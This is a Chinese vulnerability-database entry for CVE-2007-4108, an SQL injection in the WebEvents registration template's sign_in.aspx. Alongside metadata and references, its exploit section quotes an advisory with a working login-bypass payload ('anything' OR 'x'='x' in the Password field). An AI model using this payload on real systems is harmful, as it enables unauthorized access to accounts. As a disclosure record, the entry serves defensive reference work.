Online Event Registration Template Sign_In.ASPX SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1189611 漏洞类型 SQL注入
发布时间 2007-07-31 更新时间 2007-08-01
CVE编号 CVE-2007-4108 CNNVD-ID CNNVD-200707-562
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2007080015
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200707-562
|漏洞详情
WebEvents(在线事件登记模板)的sign_in.aspx中存在SQL注入漏洞。远程攻击者可以借助Password参数,执行任意SQL指令。
|漏洞EXP
__________________________

A R I A - S E C U R I T Y
_________________________

WebEvents: Online Event Registration Template Username Field SQL Injection
Vendor: http://www.codewidgets.com

http://target.com/PATH/sign_in.aspx

Username: admin
Password: anything' OR 'x'='x

Credits: Aria-Security Team
http://aria-security.net
http://outlaw.aria-security.info
|参考资料

来源:BID
名称:25111
链接:http://www.securityfocus.com/bid/25111
来源:BUGTRAQ
名称:20070727WebEvents:OnlineEventRegistrationTemplateUsernameFieldsSQLINJECTION
链接:http://www.securityfocus.com/archive/1/archive/1/474933/100/0/threaded
来源:BUGTRAQ
名称:20070728WebEvents:OnlineEventRegistrationTemplateUsernameFieldsSQLINJECTION
链接:http://www.securityfocus.com/archive/1/archive/1/474931/100/0/threaded
来源:SECUNIA
名称:26252
链接:http://secunia.com/advisories/26252
来源:MISC
链接:http://outlaw.aria-security.info/?p=10
来源:XF
名称:webevents-signin-sql-injection(35671)
链接:http://xforce.iss.net/xforce/xfdb/35671
来源:SREASON
名称:2948
链接:http://securityreason.com/securityalert/2948